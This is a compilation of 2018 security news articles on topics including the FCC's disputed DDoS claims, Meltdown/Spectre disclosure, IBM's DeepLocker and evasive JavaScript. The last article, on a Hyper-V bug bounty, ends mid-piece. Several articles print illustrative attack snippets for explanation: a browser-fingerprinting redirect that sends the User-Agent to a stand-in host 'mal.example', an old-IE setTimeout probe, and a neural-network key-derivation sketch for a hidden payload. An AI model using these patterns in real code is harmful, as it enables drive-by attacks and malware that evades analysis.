
“Attack” on FCC over net neutrality was legitimate traffic, report says

Oh, that poor, poor, net neutrality commenting system. If it wasn’t HBO’s John Oliver unleashing his flying monkeys on the Federal Communications Commission (FCC) – him with that site of his, giving people an actual, direct, non-convoluted way to get to the spleen-venting comments page – it was those gosh-darned distributed denial of service (DDoS) attacks.

As you may recall, in May 2017, the FCC was advancing its plan to curtail the USA’s net neutrality rules when Oliver served up an epic 19-minute rant inciting vast mobs of internet users to rise up and demand that the FCC get out of their faces.

At the height of the net neutrality debate, the commenting system struggled under the strain of responding to the mighty onslaught of visitors, leaving people stuck stewing in that spleen for a few days. At the time, FCC CIO Dr. David Bray blamed the bombardment on all those nasty hackers:

These were deliberate attempts by external actors to bombard the FCC’s comment system… While [it] remained up and running the entire time, these DDoS events tied up the servers and prevented them from responding to people attempting to submit comments.

Yes. Well. So. Anyway. About those DDoS attacks.

On Monday, FCC Chairman Ajit Pai issued a statement ahead of an FCC Office of Inspector General (OIG) report that found no evidence of DDoS attacks.

The finding came to light after the OIG investigated the supposed DDoS attacks. Pai said he’s glad that the report “debunks the conspiracy theory that my office or I had any knowledge that the information provided by the former CIO was inaccurate and was allowing that inaccurate information to be disseminated for political purposes.”

The fictitious DDoS attacks were concocted by Obama-era hires, Pai said, thereby throwing CIO Bray and his underlings under the bus:

I am deeply disappointed that the FCC’s former [CIO], who was hired by the prior Administration and is no longer with the Commission, provided inaccurate information about this incident to me, my office, Congress, and the American people. This is completely unacceptable. I’m also disappointed that some working under the former CIO apparently either disagreed with the information that he was presenting or had questions about it, yet didn’t feel comfortable communicating their concerns to me or my office.

So if it wasn’t a cyberattack, what was it? According to the OIG report, released Tuesday, the comment system problems were most likely caused by a combination of “system design issues” and a massive surge in legitimate traffic after John Oliver told millions of TV viewers to flood the FCC’s website with pro-net neutrality comments.

The OIG investigators couldn’t “substantiate the allegations of multiple DDoS attacks” made by Bray – and maintained by the FCC for over a year – the report says.

At best, the published reports were the result of a rush to judgment and the failure to conduct analyses needed to identify the true cause of the disruption to system availability.

Granted, the OIG report says, there was a smattering of “anomalous activity.” DoS attempts can’t be entirely ruled out during the period in question, from 7 May 2017 to 9 May 2017. Still, the report says…

We do not believe this activity resulted in any measurable degradation of system availability given the minuscule scale of the anomalous activity relative to the contemporaneous voluminous viral traffic.

The OIG said it was apparent from the get-go that the press releases about cyberattacks had been pulled out of thin air, given the lack of corroborating documentation:

We learned very quickly that there was no analysis supporting the conclusion in the [FCC] press release, there were no subsequent analyses performed, and logs and other material were not readily available.

Following the initial crash, the FCC explicitly blamed DDoS attacks. From the agency’s original statement:

Beginning on Sunday night at midnight, our analysis reveals that the FCC was subject to multiple distributed denial-of-service attacks (DDoS). These were deliberate attempts by external actors to bombard the FCC’s comment system with a high amount of traffic to our commercial cloud host. These actors were not attempting to file comments themselves; rather they made it difficult for legitimate commenters to access and file with the FCC. While the comment system remained up and running the entire time, these DDoS events tied up the servers and prevented them from responding to people attempting to submit comments. We have worked with our commercial partners to address this situation and will continue to monitor developments going forward.

The report also found that Pai’s office did nothing to inform the IT department about the oncoming onslaught of John Oliver-prompted traffic:

FCC Management was aware The Last Week Tonight with John Oliver program was considering an episode on the Net Neutrality proceeding but did not share that information with the CIO or IT group.

Bray, the former CIO, said the OIG never contacted him for the report and that he hadn’t had the opportunity to share what he observed or concluded during the incident.

When Gizmodo asked the FCC why investigators hadn’t questioned Bray, it got no response. But according to the publication, Bray has previously leaked “baseless” claims that the FCC was struck by another cyberattack in 2014. He was also the first FCC official to publicly claim that attackers had gone after the comment system last May – in spite of the FCC’s security team having found no evidence of malicious intrusion.

Late on Tuesday, Senator Ron Wyden put out a statement saying that the OIG report shows that the American people were deceived by the FCC and Chairman Pai as they went about doing the bidding of Big Cable.

Easier to do that than to listen to the majority of people who fought for net neutrality, he said:

It appears that maintaining a bogus story about a cyberattack was convenient cover to ignore the voices of millions of people who were fighting to protect a free and open internet.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/t3egZPr3-gM/

Google to warn companies targeted in government-backed attacks

Is your company running G Suite? If so, from August you’ll have the option to enable alerts if Google suspects government-backed hacking attempts on any of your accounts.

Since 2012, Google has been alerting individual Google account users if it suspects their accounts have been targeted by government-backed attackers using any number of phishing- or malware-based methods (malicious attachments, scripts embedded in files, dodgy links). This August update extends these alerts to G Suite administrators as well, so they can take action to protect their users.

In the case of suspected government-backed activity on an organization’s G Suite account, an email alert would go directly to the G Suite super admins – not the user. From there, the admins can then choose what to do with that information: Bolster security on that user’s account, share the information with other team members, and/or warn the user directly.

Google notes that “less than 0.1% of all Gmail users” receive a notification of potential government-backed attacks on their accounts, and the notification is not sent in real-time. Google also takes pains to note that:

  1. Google’s suspicion of an attack could very well be a false alarm.
  2. Google will not name the specific methods it has detected that could be triggering the alarm.
  3. Google will not attempt to attribute the attack to any party, government or nation.

In any case, since the notifications are light on details and aren’t sent in real-time, users and admins alike may be left scratching their heads wondering what exactly triggered this warning. This could be frustrating for G Suite administrators who might want this information to understand what kinds of targeted attacks are coming their organization’s way. However, Google argues that the end result is the same regardless of whether you’re a user or an admin: Take additional precautions to secure user accounts.

So what should you do if you are one of the extremely small percentage of users or admins who encounter this warning? After resetting the password, enabling two-factor authentication (if you haven’t already) is a very good next step to take.

Both individual and G Suite users can also opt to enroll in Google’s free Advanced Protection program, which offers above-and-beyond protections for users who might be frequent targets of government ire or potential meddling, like political candidates, reporters or activists. (To give you an idea of how this works, Advanced Protection has these users start with buying two physical security keys as a replacement for more standard 2FA tokens.)

Any admins wishing to enable this alert should log in to their G Suite console, click Reports, then Manage Alerts, and enable the “Government-backed attack” option, which is off by default. Google notes that this feature is rolling out to all G Suite admins over a 15-day period starting on 1 August, so if you don’t see the option just yet, it should be available soon.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/TfUG7Ecpcaw/

Discover the lurking dangers ahead at Sophos ‘See the Future’ event

Promo Cybersecurity software firm Sophos is inviting IT professionals to “See the Future” at The Brewery, near the Barbican in London, on Tuesday 9 October.

Starting at 8.45am and continuing until 4.15pm, this free event will include lunch in elegant 18th century surroundings. In between talks and breakout sessions, the experts from Sophos will cover everything from the latest ransomware threats to current trends in IT security and how to future-proof your organisation.

Attendees will gain an insider’s view on the company’s latest technology developments, the innovations it has in the pipeline and its business strategy.

Sophos CEO Kris Hagerman and Dan Schiappa, Senior Vice President and General Manager of Products, will be the main speakers. They will also be available for informal talks and questions.

Likely to be the star attraction will be keynote speaker Alexis Conran, best known for his appearances on The Real Hustle, the BBC3 programme exposing scams and cons. Cook, raconteur, magician, card-shark and hustler, Alexis will tell you everything you need to know about risk, communication and body language.

Curious about today’s threat landscape? In this breakout session, a virtual tour of SophosLabs will give attendees an insight into the current threat landscape and its impact on IT security. See a live demonstration of some of the data and bespoke systems SophosLabs uses to fend off today’s threats.

Crypto-ransomware looms over the threat landscape, not only fooling up-to-date anti-spam and web gateway appliances, but endpoint antivirus defences as well. Attend this breakout session to learn its history and explore today’s crypto-ransomware attacks. An overview of this shape-changing predator will benefit your wallet as well as your organisation’s productivity and intellectual property.

Phishing attacks have seen a meteoric rise in the last year as attackers continue to share successful attack types. Find out how they have taken advantage of malware-as-a-service offerings on the dark web to step up attacks.

Register here to secure your place.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/09/discover_the_lurking_dangers_ahead_at_sophos_see_the_future_event/

Oh, No, Not Another Security Product

Let’s face it: There are too many proprietary software options. Addressing the problem will require a radical shift in focus.

Organizations and businesses of all types have poured money into cybersecurity following high-profile breaches in recent years. The cybercrime industry could be worth $6 trillion by 2022, according to some estimates, and investors think that there’s money to be made. But like generals fighting their last battle, many investors are funding increasingly complex point solutions while buyers cry out for greater simplicity and flexibility.

Addressing this problem requires a radical shift in focus rather than a change of course. Vendors and investors need to look beyond money and consider the needs of end users.

More Money, More Problems
London’s recent Infosecurity conference included more than 400 vendors exhibiting, while RSA in San Francisco boasted more than 600. And this only includes those with the marketing budgets and inclination to exhibit. One advisory firm claims to track 2,500 security startups, double the number of just a few years ago. Cheap money has created a raft of companies with little chance of IPO or acquisition, along with an even greater number of headaches for CISOs trying to make sense of everything.

The market is creaking from this trend, with Reuters reporting mergers and acquisitions down 30% in 2017, even as venture capital investment increased by 14%. But the real pain is being felt by CISOs trying to integrate upward of 80 security solutions in their cyber defenses, as well as overworked analysts struggling to keep up. The influx of cash also has caused marketing budgets to spike, leading to a market in which it is deemed acceptable for increasingly esoteric products to be promoted to CISOs as curing everything.

All of this feeds into a sense of “product fatigue” where buyers are frightened into paying for the latest black box solution, only to see their blood pressure spike when they find that they don’t have the necessary resources to deploy or support these tools. This situation does not benefit any of the parties — the overwhelmed CISO, the overly optimistic investors, or the increasingly desperate vendors caught in limbo between funding rounds when their concepts weren’t fully baked to begin with.

Addressing complex modern threats calls for sophisticated tools and products, but we cannot fight complexity with complexity. Security operations center teams cannot dedicate finite analyst capacity to an ever-expanding battery of tools. Fragmentation within the security suite weakens company defenses and the industry as a whole, and the drain on analysts’ time detracts from crucial areas such as basic resilience and security hygiene.

Platforms, Not Products
The industry doesn’t need more products, companies, or marketing hype. We need an overhaul of the whole approach to security solutions, not an improvement of components. Security should be built on platforms with a plug-and-play infrastructure that better supports buyers, connecting products in a way that isn’t currently possible.

Such platforms should be flexible and adaptable, rewarding vendor interoperability while punishing niche solutions that cannot be easily adopted. This would lead to collaboration within the industry and create a focus on results for end users, rather than increasingly blinkered product road maps. Such platforms could act as a magnifying glass for innovation, providing a sandbox to benchmark new technologies and creating de facto security standards in the process.

This move from proprietary architecture to open modular architecture is a hallmark of Clayton Christensen’s disruptive innovation theory, and it is long overdue within the security industry. Buyers will have greater control of their tech stacks, while vendors and investors will get to proof-of-concept faster, and see greater efficiency within the market.

One example of such a platform is Apache Metron, an open source security platform that emerged from Cisco. Metron has been adopted by a number of major security providers and provides a glimpse of what the future of security should look like.

Collaborating, creating industry standards, or making technologies open source does not mean that vendors can’t make money; in fact, the reverse is true. Customers will be more willing to invest in security solutions that they know are future-proofed, that don’t come with the dreaded “vendor lock-in,” and that simplify rather than further complicate their architecture. 

Like all of security, there are varying degrees of risk and reward, but this approach is starting to look like the only logical future in an increasingly frothy, confusing, and low return-on-investment field. There will be a correction in the security market, whether it is in a month or a year. The fundamentals that will cause this are already evident, so there is an excellent opportunity to learn the lessons in advance and minimize the pain by contributing toward the platforms of the future.


Paul Stokes has spent the last decade launching, growing, and successfully exiting security and analytics technology companies. He was the co-founder and CEO of Cognevo, a market-leading security analytics software business that was acquired by Telstra Corporation.

Article source: https://www.darkreading.com/endpoint/oh-no-not-another-security-product/a/d-id/1332453?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Revealed: El Reg blew lid off Meltdown CPU bug before Intel told US govt – and how bitter tech rivals teamed up

Black Hat Next time you leave things to the last minute, remember this well.

Despite having known about the Meltdown and Spectre security vulnerabilities for roughly six months, Intel and other chip giants still hadn’t warned the US government’s cybersecurity nerve-center by the time The Register blew the lid off the design flaws.

Chipzilla and its semiconductor-slinging rivals had planned to tell US-CERT – Homeland Security’s Computer Emergency Response Team – around January 3 that they were going to go public on January 9 with details of processor bugs that could be exploited by malware to steal sensitive information, such as passwords and crypto-keys, from PCs, Macs, smartphones, and other devices.

The chip designers had been alerted to the Meltdown and Spectre vulnerabilities months before, around June 2017, but kept everything hush-hush under a strict embargo as they worked on squashing the bugs.

On Tuesday, January 2, after piecing together snippets of Linux kernel source code changes, mailing list posts by software engineers, and clues whispered to us by industry insiders, El Reg broke the news that operating system makers were scrambling to rewrite portions of their software to mitigate what came to be known as Meltdown and Spectre.

That sparked another mad dash in the tech world, as the vendors that had planned to go public with patches, mitigations, and details of the design blunders in seven days’ time were now forced to scrap their embargo – and move disclosure forward to January 3.


This timeline is according to industry bods appearing on a panel on Wednesday evening at this year’s Black Hat USA hacking conference in Las Vegas. The speakers were Art Manion of the Software Engineering Institute’s CERT Coordination Center (CERT/CC); Christopher Robinson of Red Hat; Eric Doerr of Microsoft; and Matt Linton of Google.

Their panel, titled “The True Story of Fighting Meltdown and Spectre,” sought to reveal what went on behind the scenes in the months, days, and hours leading up to The Register‘s exclusive. And, for what it’s worth, we vultures were not aware of any embargo, and did not receive any guidance from Intel’s PR team despite contacting it while preparing the piece.

On January 3, after Google, Red Hat, Intel, Arm, AMD, and others spilled the beans, CERT/CC, which is sponsored by the Department of Homeland Security, published an advisory based on this now-public information, having had no heads up. A day later, US-CERT issued its formal alert, noting it too had only found out about the bugs that week, on January 3, and referenced CERT/CC’s writeup.

This also explains why CERT/CC initially advised people on January 3 to replace their vulnerable processor hardware, as it had not been fully briefed on the availability and rollout of microcode patches and software mitigations. It corrected its advisory when it became clear less drastic options were available.

“The embargo holders had been planning to tell CERT a week before the embargo lifted,” Linton, whose job title at Google is chaos specialist, told The Register after the panel session. “Had they known, CERT could have advised people that patches were available but instead initially recommended those affected should replace their processors.”

Manion, a senior vulnerability analyst at CERT/CC, said somewhat jokingly that he was a little hurt not to have been told about the issue earlier. But, he said, that did at least allow him to get a decent Christmas break – a lot of kernel developers lost their festive holiday time to rewriting memory management code.

Eagle-eyed Googlers notified chip makers and designers in and around June 2017 that their speculative execution engines – used to prime processors with instructions to execute in order to run software as fast as possible – had various exploitable security shortcomings. In turn, operating system developers were alerted, as workarounds would require changes to kernels.

The upshot of the hardware-level bugs was that malware on a computer, JavaScript in a webpage, or a rogue logged-in user, could abuse the holes to lift secrets out of the operating system and other applications. So far, no miscreants have been caught exploiting the vulnerabilities in the wild, to the best of our knowledge. We suspect this is partly due to the wide rollout of mitigations, and partly due to there being better bugs for hackers to abuse.
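For the curious, here’s a minimal, illustrative sketch of the bounds-check-bypass pattern at the heart of Spectre variant 1 – our own illustration, not code from any of the vendors involved, and nowhere near a working exploit. A real attack would also have to mistrain the branch predictor, and would need a high-resolution timer and cache-probing code to recover the leaked byte.

var array1 = new Uint8Array(16);              // legitimate, in-bounds data
var probeTable = new Uint8Array(256 * 4096);  // one cache line per possible byte value

function gadget(index) {
    if (index < array1.length) {
        // A mistrained branch predictor lets the CPU run these loads
        // speculatively even when index is out of bounds...
        var secret = array1[index];
        // ...leaving a secret-dependent line in the cache, which an
        // attacker later detects by timing accesses to probeTable.
        var dummy = probeTable[secret * 4096];
    }
}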

Come together

The whole shebang sparked a remarkable collaboration between rivals, we’re told. “Months before the public learned about the challenges with speculative execution, defenders from hardware, platform, cloud, and service providers were working together around the clock building mitigations and coordinating a response to help protect the billions of users depending on their platforms,” the panel explained in their session blurb. “Along the way, competitors became partners, and an unprecedented level of information was shared.”

At first, every biz involved worked alone on the issue, until in the autumn of 2017 there was an unprecedented meet-up of engineers from fierce rivals. The goal: to develop better solutions to Meltdown and Spectre.

“We had the face-to-face in November,” said Doerr, general manager of the Microsoft Security Response Center. “It’s funny how rare that kind of meeting is. There was pushback at Microsoft that the legal arrangements would be hard. Honestly, I was blown away by the collaboration in the room. It was a leap of faith to trust that this was the right thing to do.”

Robinson, a Red Hat security team lead, said that given the thousands of people working on the project in secret, he was surprised the news didn’t leak earlier. But when it did, he got a call on January 3 saying the patches needed to be deployed that day.

Eight hours later, he was pushing out fixes. He told The Register that a lot of minor work still had to be done after the initial public disclosure as the disclosure date had been set for January 9.

“The attack is brilliant, it’s very creative, and it’s stunning no one found it earlier,” Robinson said. “Every year we push out 100 fixes for vulnerabilities more severe than Spectre, which we only rated as ‘important’ on our scale.”

Leno-doh!

During the panel discussion, the situation with Lenovo was brought up: there were claims earlier that Intel alerted the Chinese PC maker – and thus, via proxy, the Chinese government – about the CPU-level flaws before it warned the US government. Given the above timeline, we can imagine our story detonating the embargo in between Chipzilla warning the computer manufacturer and Uncle Sam.


An audience member introduced himself as a Lenovo staffer who was briefed on Meltdown and Spectre ahead of the planned disclosure date, and he denied the Chinese government had been made aware of the issue in advance. By his reckoning, only a couple of dozen people at Lenovo knew about the issue, and all were based in the US, apart from one developer in Japan.

Linton had been quizzed by US politicians somewhat miffed at the handling of the bug disclosures, and defended the decision not to tell the American government until literally the final week. He was told the US administration could have taken some actions, such as moving sensitive virtual machines to an environment where the vulnerabilities definitely could not be exploited. Frankly, he said, he was shocked the government wasn’t doing this already as basic operational security.

One of the key points your humble hack picked up from the panel session, apart from the CERT timing kerfuffle, was that collaboration between bitter rival corporations and face-to-face communications are incredibly important – and something the industry should encourage more, with one important restriction.

“It really is all about communications,” Linton said. “But the rules have to be that no one throws shade at anyone else. This nascent sense of cooperation is something we want to nurture. The one thing that will kill it is a press release in which someone claims to be better [at security] than the others in the group.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/09/meltdown_spectre_cert_timing/

Should I infect this PC, wonders malware. Let me ask my neural net…

Black Hat Here’s perhaps a novel use of a neural network: proof-of-concept malware that uses AI to decide whether or not to attack a victim.

DeepLocker was developed by IBM eggheads, and is due to be presented at the Black Hat USA hacking conference in Las Vegas on Thursday. It uses a convolutional neural network to stay inert until the conditions are right to pounce.

When samples of software nasties are caught by security researchers, they can be reverse-engineered to see what makes them tick, and what activates their payload, which is the heart of the malicious code that spies on the infected user, steals their passwords, holds their files to ransom, and so on. These payloads can be triggered by all sorts of things, from the country in which the computer is located, whether or not it is running in a virtual machine, how long the machine has been idle, etc.

This is all information that network defenders and antivirus tools can use to thwart or mitigate the spread and operation of the software. However, while it’s possible to reverse-engineer simple heuristic checks within a malicious program, to figure out the trigger conditions, it’s rather hard to work out what will make a trained neural network run a payload, just by studying its data structure.
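To see why those simple checks give the game away, consider the kind of trigger logic an analyst can read straight out of a captured sample – a generic, hypothetical sketch, not code from any specific nasty:

// Every condition is spelled out in the code, so a reverse-engineer can
// see exactly what flips the switch (and how to simulate or block it).
function shouldDetonate(env) {
    if (env.country !== "US") return false;    // geographic targeting
    if (env.isVirtualMachine) return false;    // dodge sandboxes and analysis VMs
    if (env.idleMinutes < 10) return false;    // wait for an unattended machine
    return true;
}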

Similarly, if the payload is encrypted, it’s possible the decryption key can be figured out from the heuristic code that unlocks it. However, if the payload is encrypted using a key derived from a neural network’s output, and you can’t easily reverse-engineer the network, you’ll have a hard time making it cough up the right key and decrypting the payload.
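Here’s a minimal Node.js sketch of that key-from-model-output idea – our own illustration, not IBM’s DeepLocker code. The classify() function is a hypothetical stand-in for the trained network, and the quantization step is one assumed way of making a fuzzy embedding yield the same key bytes every time the right target is seen.

const crypto = require('crypto');

// Hypothetical stand-in for the trained network: maps a camera frame to
// an embedding vector. In IBM's demo this was a face-recognition model.
function classify(frame) {
    return [0.12, 0.87, 0.33]; // ...many more dimensions in a real model
}

// Quantize the embedding so the intended target reliably produces the
// same bytes, then hash those into a 256-bit key. The key itself never
// ships with the malware; only the network that can regenerate it does.
function deriveKey(embedding) {
    const quantized = embedding.map(x => Math.round(x * 16)).join(',');
    return crypto.createHash('sha256').update(quantized).digest();
}

function tryUnlock(frame, encryptedPayload, iv) {
    const key = deriveKey(classify(frame));
    try {
        const decipher = crypto.createDecipheriv('aes-256-cbc', key, iv);
        return Buffer.concat([decipher.update(encryptedPayload), decipher.final()]);
    } catch (e) {
        return null; // wrong face, wrong key: the payload stays opaque
    }
}

Feed it anything but the intended victim and decryption simply fails, leaving an analyst holding ciphertext and a network they can’t invert.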

Deep, man

To demonstrate this, IBM took a copy of the WannaCry ransomware, encrypted and hid it in a benign video-conference app, and wrapped machine-learning code around it that used a trained neural network to cough up the key to unlock and run the file-scrambling WannaCry payload.

That neural network was trained to recognize a particular victim’s face from the computer’s front-facing camera. When it spotted the right person in front of the PC, it provided the key needed to unlock the payload so it could be executed, and hold the system’s documents to ransom.

Robot hand holding cards

You should find out what’s going on in that neural network. Y’know they’re cheating now?

READ MORE

The ingenious part is that it turns what many consider a major weakness of neural networks into a strength. Neural networks are frustratingly difficult to understand because they act like black boxes: it’s difficult to study how they arrive at their final answer from a given input just by looking at how individual neurons in the system fire.

“A simple ‘if this, then that’ trigger condition is transformed into a deep convolutional network of the AI model that is very hard to decipher,” Marc Stoecklin, a principal research scientist and manager of IBM’s Cognitive Cybersecurity Intelligence group, explained. “In addition to that, it is able to convert the concealed trigger condition itself into a ‘password’ or ‘key’ that is required to unlock the attack payload.”

Since it’s difficult to work out what triggers the payload, such a model would be very difficult to tackle, the researchers argued. Rest assured, however: the IBMers have not released any code, and there’s no sign of any malware using this machine-learning technique in the wild.

“While a class of malware like DeepLocker has not been seen in the wild to date, these AI tools are publicly available, as are the malware techniques being employed — so it’s only a matter of time before we start seeing these tools combined by adversarial actors and cybercriminals,” said Stoecklin.

“In fact, we would not be surprised if this type of attack were already being deployed. The security community needs to prepare to face a new level of AI-powered attacks. We can’t, as an industry, simply wait until the attacks are found in the wild to start preparing our defenses. To borrow an analogy from the medical field, we need to examine the virus to create the ‘vaccine.'” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/09/neural_network_malware/

WhatsApp security snafu ‘could allow message manipulation’

Researchers have uncovered security shortcomings in WhatsApp that create a means for hackers to intercept and manipulate messages sent in both private and group conversations.

Protocol decryption cleared the path to chat manipulation, boffins at Israeli security firm Check Point discovered.

Researchers at Check Point first converted WhatsApp’s (encrypted) protobuf2 data to JSON – a decoding step sketched after the list below. They then developed extensions to the popular Burp Suite that they claimed facilitated three manipulation methods, allowing them to:

  1. alter the text of someone else’s reply, essentially putting words in their mouth;
  2. use the “quote” feature in a group conversation to change the identity of the sender, even if that person is not a member of the group; and
  3. send a private message to another group participant that is disguised as a public message for all, so when the targeted individual responds, it’s visible to everyone in the conversation.
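To give a flavour of that protobuf-to-JSON step, here is a minimal JavaScript walk of protobuf’s wire format – a generic illustration only, not Check Point’s actual Burp extension, which also had to deal with WhatsApp’s encryption and with re-encoding tampered messages. It assumes a Node.js Buffer already holding decrypted message bytes.

function readVarint(buf, pos) {
    // Protobuf varints use 7 bits per byte; a set high bit means more bytes follow
    var value = 0, shift = 0, byte;
    do {
        byte = buf[pos++];
        value += (byte & 0x7f) * Math.pow(2, shift); // avoids 32-bit overflow
        shift += 7;
    } while (byte & 0x80);
    return { value: value, pos: pos };
}

function listFields(buf) {
    var pos = 0, fields = [];
    while (pos < buf.length) {
        var tag = readVarint(buf, pos);
        pos = tag.pos;
        var field = Math.floor(tag.value / 8); // field number
        var wire = tag.value & 7;              // wire type
        if (wire === 0) {                      // varint: ints, bools, enums
            var v = readVarint(buf, pos);
            pos = v.pos;
            fields.push({ field: field, type: "varint", value: v.value });
        } else if (wire === 2) {               // length-delimited: strings, sub-messages
            var len = readVarint(buf, pos);
            pos = len.pos;
            fields.push({ field: field, type: "bytes", value: buf.slice(pos, pos + len.value) });
            pos += len.value;
        } else if (wire === 1) { pos += 8;     // 64-bit fixed
        } else if (wire === 5) { pos += 4;     // 32-bit fixed
        } else { break; }                      // unknown wire type: bail out
    }
    return fields;
}

// The classic protobuf example: bytes 08 96 01 decode to field 1 = varint 150
console.log(JSON.stringify(listFields(Buffer.from([0x08, 0x96, 0x01]))));

Once the fields are laid out like this, changing a quoted sender or a message body is a matter of editing a value and re-encoding – which is essentially what the Burp extensions automated.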

The white hat hackers said they’d found it was possible to fake messages and sow the seeds of all sorts of confusion. All the techniques involve social engineering tactics to hoodwink end users, as explained at some length in a blog post by Check Point here.

Kevin Bocek, chief cybersecurity strategist at machine identity protection vendor Venafi, told us: “This was a serious flaw and it’s made possible thanks to machine identities – encryption keys and digital certificates that enable privacy and authentication between our devices, apps, and clouds.”

El Reg asked Facebook/WhatsApp to comment but we’re yet to receive a response. We’ll update this story as and when more information comes to hand. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/09/whatsapp_message_manipulation/

How evil JavaScript helps attackers tag possible victims – and gives away their intent

A honeypot project operated by Japanese comms company NTT has turned up a bunch of new approaches to malware obfuscation.

Yuta Takata of NTT’s Secure Platform Laboratories has published an analysis at the Asia Pacific Network Information Centre (APNIC) here. In it, he wrote that since JavaScript can be used to identify different (and vulnerable) browsers, it’s worth watching to see if malware authors are using it that way.

Takata’s group identified five evasion techniques that all abuse differences between JavaScript implementations, he stated – an approach more complex than familiar redirection attacks, which look at the User-Agent and redirect victims to pages specific to their browser.

In other words, this code would redirect an Internet Explorer 8 user to an attack site, but leave others alone:

var ua = navigator.userAgent;
if (ua.indexOf("MSIE 8") !== -1) {
    // Inject a hidden iframe that hauls the IE 8 victim off to the attack
    // server, reporting the User-Agent string along the way
    var ifr = document.createElement("iframe");
    ifr.setAttribute("src", "http://mal.example/ua=" + ua);
    document.body.appendChild(ifr);
}

It matters, Takata said, because the evasion techniques identified in the research can serve as attack signatures.

The NTT team took two approaches to traffic collection: a “high interaction” honeyclient (a real browser designed to detect browser exploits), and a “low interaction” honeyclient that can “emulate many different client profiles, trace complicated redirections and hook code executions in detail”.

Over several years, the NTT group collected and analysed 8,500 JavaScript samples from 20,000-plus malicious sites, and found five previously unseen evasion techniques.

Takata wrote that, of these, setTimeout() provided the best indicator of compromise (IOC) – mainly because the other four aren’t in current use.

That particular function helped attackers identify IE 8 and IE 9 browsers, because they return an “Invalid argument” error if a site asks them to process setTimeout(10); Firefox and Chrome don’t.
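The probe itself is tiny. The snippet below is our reconstruction of the trick rather than the exact code NTT captured: hand setTimeout() an invalid callback and see whether the browser objects.

var oldIE = false;
try {
    setTimeout(10);  // IE 8 and 9 throw "Invalid argument" at a non-function callback
} catch (e) {
    oldIE = true;    // Firefox and Chrome don't complain, so only old IE lands here
}
if (oldIE) {
    // ...serve the exploit only to the fingerprinted, vulnerable browser
}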

The setTimeout(10) probe turned out to be the strongest IOC of the five evasive code snippets NTT identified in its scan of more than 860,000 URLs: all of the 26 URLs that served up setTimeout(10) were in compromised websites, members of a mass “Fake jQuery” injection campaign. The other samples turned out to be either benign, or no longer in use. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/09/how_evil_javascript_helps_attackers_tag_possible_victims_and_gives_away_their_intent/

Stress, bad workplace cultures are still driving security folk to drink

Black Hat In a personal and powerful presentation, a computer security veteran has warned that too many infosec bods are fighting a losing battle with the bottle.

Jamie Tomasello, senior manager of security operations at Duo Security, has 17 years of experience in the industry, and has been sober for the past six. While the causes of alcoholism come down to many factors, including genetics, practices within the security industry make dangerous levels of addiction a lot harder to deal with, and stop people from speaking out.

“Even after 17 years, I’m more afraid of disclosing I’m a recovering alcoholic than any vulnerability I’ve found in code,” Tomasello told this year’s Black Hat USA attendees in Las Vegas on Wednesday. “Our work environments work against us and we push ourselves to run on empty far more than we should.”

A key factor is stress. Security professionals often work long hours, have to be instantly on call for emergencies, and the consequences of messing up on the job can be massive. When humans get stressed, the brain floods with cortisol, increasing the heart rate and blood pressure, triggering sweating and increasing breathing. This “fight or flight” reaction is a product of our evolution, and is an essential survival tool.

Chemistry

However, being stressed repeatedly does change the brain’s chemistry somewhat, and chronic drinkers have been found to display very high levels of cortisol. There is a clear relationship here, with stress helping to form addictive behaviors, Tomasello warned, and encouraging damaging levels of addiction to take root.

Workplace culture also doesn’t help. Many offices have beer on tap, wine in the fridge, and hard liquor on the shelves as a perk for employees, and that increases the temptation to problem-drink. Many company events are also either held in bars, or stocked with copious amounts of booze.

There’s also the social stigma, and a lack of understanding: some people can manage their drink, and yet are unable to manage those who can’t. Tomasello recounted how one boss, who knew of her condition, would still encourage her to sink a tipple with the team.

“We don’t tell people with diabetes, ‘Go on, have the cupcake,’ so why treat anyone with substance problems any differently?” she said.

There are also false myths to deal with. Some people think that the longer you have been sober, the easier it is to stay on the wagon. However, she said the past year of sobriety has been the hardest for her, and sometimes she just had to take it one day at a time.

Some coping strategies work better than others. Tomasello said she actively encourages staff to take their full vacation allowance, so they can unwind, destress, and let their brains get back into shape without having to self-medicate with grog. She also advised tipping a bartender at the start of the night to just serve you non-alcoholic drinks.

If people are at hotels for conventions, or at the airport on the way, another technique is to ask a staffer if “a friend of Bill W.” has checked in. This is code for asking where the nearest Alcoholics Anonymous meeting is – AA was started by William Wilson – and many places have staff trained to let you know where meetings are being held.

Tomasello insisted she isn’t anti-alcohol, nor trying to start a temperance movement, and instead urged delegates to do what they can to help colleagues who are suffering from substance issues, and to destress staff – rather than distress – as much as possible to stop things getting worse. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/08/infosec_professionals_alcohol/

Microsoft to hackers: Finding Hyper-V bugs is hard. Change my mind. PS: Here’s a head start…

Black Hat Not that many moons ago, Microsoft was seemingly reluctant to open a bug bounty program. It also once described Linux as a cancer. Now it claims to love Linux, and is offering bounties on bugs. How times change.

On Wednesday, Redmond not only reiterated its offer of oodles of cash in exchange for details of exploitable vulnerabilities in Hyper-V, it went as far as telling hackers the best places to look for lucrative mistakes in its hypervisor software.

In a presentation at this year’s Black Hat USA conference in Las Vegas, Microsoft security engineers Joe Bialek and Nicolas Joly spent nearly an hour going through the defense mechanisms and architecture within Hyper-V, and suggesting the best areas to hunt for programming blunders. The Windows hypervisor is also, for what it’s worth, documented in various levels of detail here and here and here.

If someone can find a way to exploit Hyper-V, they could be looking at a $250,000 payout – and Bialek said Microsoft would be keen to cough up.

“Finding bugs in Hyper-V is very hard,” he told the crowd, “so we pay out the maximum bounty more often than not for them.”


He advised hackers not to spend too much time on the hypervisor itself. Rather, a much more promising area is the root partition, aka the parent partition, as this not only has access to physical memory, it also has control over devices and is responsible for services used by software in other partitions on the system. What Redmond calls a partition, you could call a virtual machine instance.

The root partition also implements emulated hardware as well as providing paravirtualized networking, storage, video, and PCI devices, which makes it a crucial and inviting component.

The low-level communications channels between partitions and the hypervisor are also worth exploring – particularly the VMBus, a high-speed software interface between guest partitions and the root partition, which has all those goodies inside it.

